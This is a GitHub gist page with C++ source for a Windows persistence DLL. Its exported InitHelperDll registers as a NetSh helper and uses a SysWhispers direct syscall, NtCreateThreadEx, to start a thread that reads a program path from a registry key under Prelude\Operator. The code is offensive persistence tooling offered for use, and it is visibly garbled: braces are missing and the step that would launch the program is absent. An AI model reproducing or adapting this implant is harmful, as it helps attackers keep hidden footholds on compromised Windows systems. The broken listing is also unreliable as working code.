Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Use SysWhispers with NetSh DLL helper persistence to spawn processes at a given registry key
#include <locale>
#include <cstdlib>
#include <stdio.h>
#include <string>
#include <Windows.h>
#include "Syscalls.h"
LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&);
DWORD WINAPI RunBin(LPVOID lpParameter) {
setlocale(LC_CTYPE, "");
HKEY hKey;
LONG lRes = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Prelude\\Operator", 0, KEY_READ, &hKey);
bool bExistsAndSuccess(lRes == ERROR_SUCCESS);
bool bDoesNotExistsSpecifically(lRes == ERROR_FILE_NOT_FOUND);
std::wstring strValueOfBinPath;
GetStringRegKey(hKey, L"bin_path", strValueOfBinPath, L"bad");
if (strValueOfBinPath == L"bad") {
return 1;
const std::string s(strValueOfBinPath.begin(), strValueOfBinPath.end());
return 0;
LONG GetStringRegKey(HKEY hKey, const std::wstring& strValueName, std::wstring& strValue, const std::wstring& strDefaultValue)
strValue = strDefaultValue;
WCHAR szBuffer[512];
DWORD dwBufferSize = sizeof(szBuffer);
ULONG nError;
nError = RegQueryValueExW(hKey, strValueName.c_str(), 0, NULL, (LPBYTE)szBuffer, &dwBufferSize);
if (ERROR_SUCCESS == nError)
strValue = szBuffer;
return nError;
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) {
HANDLE hThread = NULL;
HANDLE hProcess = GetCurrentProcess();
LPVOID lpParams = nullptr;
NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, RunBin, lpParams, FALSE, 0, 0, 0, nullptr);
return NO_ERROR;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment